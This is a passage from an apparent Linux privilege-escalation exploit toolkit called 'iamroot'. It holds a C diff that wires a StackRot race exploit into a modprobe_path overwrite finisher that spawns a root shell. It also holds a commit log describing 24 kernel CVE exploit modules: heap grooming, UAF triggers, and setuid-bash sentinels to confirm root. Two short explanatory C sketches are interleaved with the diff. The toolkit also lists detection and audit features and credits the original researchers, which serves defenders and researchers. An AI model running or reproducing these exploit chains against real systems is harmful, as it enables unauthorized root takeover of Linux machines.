+                .n_queues  = STACKROT_SPRAY_QUEUES,
+                .arb_calls = 0,
+                .region    = &region,
+            };
+            int fr = iamroot_finisher_modprobe_path(&off,
+                                                    stackrot_arb_write,
+                                                    &arb_ctx,
+                                                    !ctx->no_shell);
+            FILE *fl = fopen("/tmp/iamroot-stackrot.log", "a");
+            if (fl) {
+                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
+                        fr, arb_ctx.arb_calls);
+                fclose(fl);
+            }
+            drain_anon_vma_slab(queues);
+            race_region_teardown(&region);
+            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);   /* root popped */
+            _exit(35);                                  /* finisher ran, no land */
+        }
+
        drain_anon_vma_slab(queues);
        race_region_teardown(&region);

@@ -673,6 +874,27 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
    int rc = WEXITSTATUS(status);
    if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
    if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
+
+    if (rc == 34) {
+        /* Finisher reported root-pop success. The shared finisher
+         * normally execve()s the root shell so we don't actually
+         * reach this path unless --no-shell was set. */
+        if (!ctx->json) {
+            fprintf(stderr, "[+] stackrot: --full-chain finisher reported "
+                            "EXPLOIT_OK (race won + write landed)\n");
+        }
+        return IAMROOT_EXPLOIT_OK;
+    }
+    if (rc == 35) {
+        /* Finisher ran but didn't land — by far the expected outcome
+         * given the <1 % race-win rate. */
+        if (!ctx->json) {
+            fprintf(stderr, "[~] stackrot: --full-chain finisher ran; race did not\n"
+                            "    win + land within budget (this is the expected\n"
+                            "    outcome — race-win reliability is <1%% per run).\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
    if (rc != 30) {
        fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
        return IAMROOT_EXPLOIT_FAIL;
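The parent/child exit-code protocol in the hunk above (22 and 24 for unmet preconditions, 23 and 35 for failure, 34 for a finisher-confirmed success) can be isolated into a small mapping function. The sketch below is not the module's code: `enum sketch_result`, `map_child_rc` and `run_child_and_map` are hypothetical stand-ins, and codes not shown in the diff (including 30) are assumed to map to failure.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in for iamroot_result_t; names are hypothetical. */
enum sketch_result { SKETCH_OK, SKETCH_EXPLOIT_FAIL, SKETCH_PRECOND_FAIL };

/* Map a child exit code to a result, following the codes in the diff. */
static enum sketch_result map_child_rc(int rc)
{
    switch (rc) {
    case 22:
    case 24:
        return SKETCH_PRECOND_FAIL;     /* environment not suitable */
    case 34:
        return SKETCH_OK;               /* finisher confirmed success */
    default:
        return SKETCH_EXPLOIT_FAIL;     /* 23, 35 and anything unexpected */
    }
}

/* Fork a child that exits with `child_exit_code`, then decode its status.
 * A child killed by a signal never counts as success. */
static enum sketch_result run_child_and_map(int child_exit_code)
{
    pid_t pid = fork();
    if (pid < 0)
        return SKETCH_EXPLOIT_FAIL;
    if (pid == 0)
        _exit(child_exit_code);         /* child: report stage via exit code */

    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return SKETCH_EXPLOIT_FAIL;
    return map_child_rc(WEXITSTATUS(status));
}
```

Checking `WIFEXITED` before `WEXITSTATUS` matters here: a child that crashes mid-race has no meaningful exit code, and defaulting every unknown case to failure keeps success tied to the one explicit code.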
Author	SHA1	Message	Date
leviathan	9d88b475c1	v0.3.1: --dump-offsets tool + NOTICE.md per module The README has been claiming "each module credits the original CVE reporter and PoC author in its NOTICE.md" since v0.1.0, but only copy_fail_family actually shipped one. Fixed. modules/<name>/NOTICE.md (×19 new + 1 existing): per-module research credit covering CVE ID, discoverer, original advisory URL where public, upstream fix commit, IAMROOT's role. iamroot.c: new --dump-offsets subcommand. Resolves kernel offsets via the existing core/offsets.c four-source chain (env → /proc/kallsyms → /boot/System.map → embedded table), then emits a ready-to-paste C struct entry for kernel_table[]. Run once as root on a target kernel build; upstream via PR. Eliminates fabricating offsets — every shipped entry traces back to a `iamroot --dump-offsets` invocation on a real kernel. docs/OFFSETS.md: documents the --dump-offsets workflow. CVES.md: notes the NOTICE.md convention + offset dump tool. iamroot.c: bump IAMROOT_VERSION 0.3.0 → 0.3.1.	2026-05-16 22:33:43 -04:00
leviathan	1bcfdd0c9f	release: v0.3.0 — 4 new CVE modules (24 total) iamroot.c: bump IAMROOT_VERSION 0.2.0 → 0.3.0 CVES.md: add inventory entries for nft_set_uaf, af_unix_gc, nft_fwd_dup, nft_payload; extend operations table; bump counts (🟢 13 · 🟡 11 · 🔵 0 · ⚪ 1). README.md: update Status to 24 modules, list all 11 🟡 modules. Module families now spanning: - copy_fail_family (page-cache write) - nf_tables (4 modules: nf_tables, nft_set_uaf, nft_fwd_dup, nft_payload) - af_packet (2 modules: af_packet, af_packet2) - overlayfs (2 modules: overlayfs CVE-2021-3493, overlayfs_setuid) - af_unix (new in v0.3.0) - plus 10 single-CVE families	2026-05-16 22:25:15 -04:00
leviathan	5a808e3583	modules: 4 new CVE modules — nft_set_uaf + af_unix_gc + nft_fwd_dup + nft_payload Each module: detect with branch-backport ranges + userns reach + hand-rolled trigger + msg_msg cross-cache groom + slabinfo witness + /tmp/iamroot-<name>.log breadcrumb + auditd rules + --full-chain finisher (FALLBACK depth, sentinel-arbitrated). nft_set_uaf (CVE-2023-32233, +1033): anonymous-set UAF (Sondej+Krysiuk). 5.1 → 6.4. nfnetlink batch: NEWTABLE → NEWCHAIN → NEWSET(ANON\|EVAL) → NEWRULE(lookup) → DELSET → DELRULE; cg-512 spray. af_unix_gc (CVE-2023-4622, +813): GC race UAF (Lin Ma). ~2.0 → 6.5 — widest range of any module. Two-thread race driver (SCM_RIGHTS cycle vs unix_gc trigger) + kmalloc-512 spray. No userns needed. nft_fwd_dup (CVE-2022-25636, +1024): nft_fwd_dup_netdev_offload heap OOB (Aaron Adams). 5.4 → 5.17. NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd to overrun action.entries[]. nft_payload (CVE-2023-0179, +1136): set-id memory corruption (Davide Ornaghi). 5.4 → 6.2. NFTA_SET_DESC variable element + NFTA_SET_ELEM_EXPRESSIONS with payload-set whose verdict.code drives the regs->data[] OOB. All 4 honor verified-vs-claimed: trigger fires, primitive grooms, no fabricated offsets. EXPLOIT_OK only via empirical setuid-bash sentinel. Build clean on Debian 6.12.86; all 4 refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate.	2026-05-16 22:24:15 -04:00
leviathan	6a0a7d8718	scaffold: 4 new module dirs + registry/Makefile wiring (stubs) Pre-scaffolding for the next batch (CVE-2023-32233, CVE-2023-4622, CVE-2022-25636, CVE-2023-0179). Each module ships as a 21-line stub returning PRECOND_FAIL; parallel agents fill in the real detect/exploit/--full-chain implementations. This commit keeps registry.h / iamroot.c / Makefile in one place so the 4 parallel agents don't collide on shared-file edits — they each own a single iamroot_modules.c. Build clean on Debian 6.12.86; --list shows all 24 modules including the 4 new stubs.	2026-05-16 22:17:47 -04:00
leviathan	e2a3d6e94f	release: v0.2.0 — --full-chain root-pop opt-in across 7 🟡 modules iamroot.c: bump IAMROOT_VERSION 0.1.0 → 0.2.0 CVES.md: redefine 🟡 to note --full-chain capability + docs/OFFSETS.md README.md: update Status section for v0.2.0 docs/OFFSETS.md: new doc — env-var/kallsyms/System.map/embedded-table resolution chain + operator workflow for populating offsets per kernel build + sentinel-based success arbitration. All 7 🟡 modules now expose `--full-chain`. Default behavior unchanged.	2026-05-16 22:06:14 -04:00
leviathan	c1d1910a90	modules: wire --full-chain root-pop into all 7 🟡 PRIMITIVE modules Each module now exposes an opt-in full-chain root-pop via --full-chain: default --exploit behavior is unchanged (primitive-only, returns EXPLOIT_FAIL). With --full-chain, after primitive lands, modules call iamroot_finisher_modprobe_path() via a module-specific arb_write_fn that re-uses the same trigger + slab groom to write a userspace payload path into modprobe_path[], then exec a setuid bash dropped by the kernel-invoked modprobe. netfilter_xtcompat (+239): msg_msg m_list_next stride-seed FALLBACK af_packet (+316): sk_buff data-pointer stride-seed FALLBACK af_packet2 (+156): tp_reserve underflow + skb spray, LAST RESORT nf_tables (+275): forged pipapo_elem with kaddr value-ptr (Notselwyn offset 0x10), FALLBACK cls_route4 (+251): msg_msg refill of UAF'd filter, FALLBACK fuse_legacy (+291): m_ts overflow + MSG_COPY sanity gate, FALLBACK (one of two modules with a real post-write sanity check) stackrot (+233): race-driver budget extended 3s → 30s when --full-chain; honest <1% race-win/run All seven honor verified-vs-claimed: arb_write_fn returns 0 for "trigger structurally fired"; the shared finisher's setuid-bash sentinel poll is the empirical arbiter. EXPLOIT_OK only when the sentinel materializes within 3s of the modprobe_path trigger. Build clean on Debian 6.12.86 (kctf-mgr); all 7 modules refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate (short-circuits before the new branch).	2026-05-16 22:04:40 -04:00
leviathan	125ce8a08b	core: add shared finisher + offset resolver + --full-chain flag Adds the infrastructure the 7 🟡 PRIMITIVE modules can wire into for full-chain root pops. core/offsets.{c,h}: four-source kernel-symbol resolution chain 1. env vars (IAMROOT_MODPROBE_PATH, IAMROOT_INIT_TASK, …) 2. /proc/kallsyms (only useful when kptr_restrict=0 or root) 3. /boot/System.map-$(uname -r) (world-readable on some distros) 4. embedded table keyed by uname-r glob (entries are relative-to-_text, applied on top of an EntryBleed kbase leak; seeded empty in v0.2.0 — schema-only — to honor the no-fabricated-offsets rule). core/finisher.{c,h}: shared root-pop helpers given a module's arb-write primitive. Pattern A (modprobe_path): write payload script /tmp/iamroot-mp-<pid>.sh, arb-write modprobe_path ← that path, execve unknown-format trigger, wait for /tmp/iamroot-pwn-<pid> sentinel + setuid bash copy, spawn root shell. Pattern B (cred uid): stub — needs arb-READ too; modules use Pattern A unless they have read+write. On offset-resolution failure: prints a verbose how-to-populate diagnostic and returns EXPLOIT_FAIL honestly. core/module.h: + bool full_chain in iamroot_ctx iamroot.c: + --full-chain flag (longopt 7, sets ctx.full_chain) + help text describing primitive-only-by-default + the opt-in to attempt the full chain. Makefile: add core/offsets.o + core/finisher.o to CORE_SRCS. Build clean on Debian 6.12.86; --help renders the new flag.	2026-05-16 21:56:03 -04:00
leviathan	3a5105c84c	README: clarify iamroot runs unprivileged + add non-root → root demo The whole point of an LPE tool is going from unprivileged to root, but the Quickstart was leading with `sudo iamroot --scan`. Fix: - Drop sudo from --scan / --audit / --exploit / --detect-rules. These work without root (--scan reads /proc + /etc; --audit walks the FS via stat; --exploit IS the privilege escalation; --detect-rules emits to stdout). - Keep sudo only where it's actually needed: --mitigate (writes /etc/modprobe.d + sysctl) and tee'ing rule files into /etc/audit/rules.d/. - Add a worked example showing `id` as uid=1000, then `iamroot --exploit dirty_pipe --i-know`, then `id` as uid=0. - Fix the Build & run section's `sudo ./iamroot` too.	2026-05-16 21:51:32 -04:00
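The `core: add shared finisher + offset resolver` commit in the table above describes a resolution chain whose `/proc/kallsyms` and `/boot/System.map` sources share one text format: a hex address, a one-letter symbol type, and the symbol name. A minimal sketch of parsing that format follows; `symbol_from_line` and `symbol_from_file` are hypothetical helpers, not the functions in `core/offsets.c`, and treating an all-zero address as unresolved is an assumption based on how kallsyms masks addresses for unprivileged readers.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: parse one "ADDR TYPE NAME" line and report the
 * address when NAME equals `want`. A zero address counts as unresolved. */
static bool symbol_from_line(const char *line, const char *want,
                             unsigned long long *addr_out)
{
    unsigned long long addr;
    char type;
    char name[128];

    if (sscanf(line, "%llx %c %127s", &addr, &type, name) != 3)
        return false;                   /* not a symbol line */
    if (strcmp(name, want) != 0)
        return false;
    if (addr == 0)
        return false;                   /* masked address: do not trust it */
    *addr_out = addr;
    return true;
}

/* Hypothetical helper: scan a kallsyms-style file for one symbol. */
static bool symbol_from_file(const char *path, const char *want,
                             unsigned long long *addr_out)
{
    FILE *f = fopen(path, "r");
    if (!f)
        return false;                   /* source unavailable: try the next one */
    char line[512];
    bool found = false;
    while (!found && fgets(line, sizeof line, f))
        found = symbol_from_line(line, want, addr_out);
    fclose(f);
    return found;
}
```

A resolver built on this could try `symbol_from_file("/proc/kallsyms", "modprobe_path", &addr)` first and fall through to the next source on `false`. Rejecting zero addresses fits the no-fabricated-offsets rule stated in the commit messages, because a masked value is never mistaken for a real one.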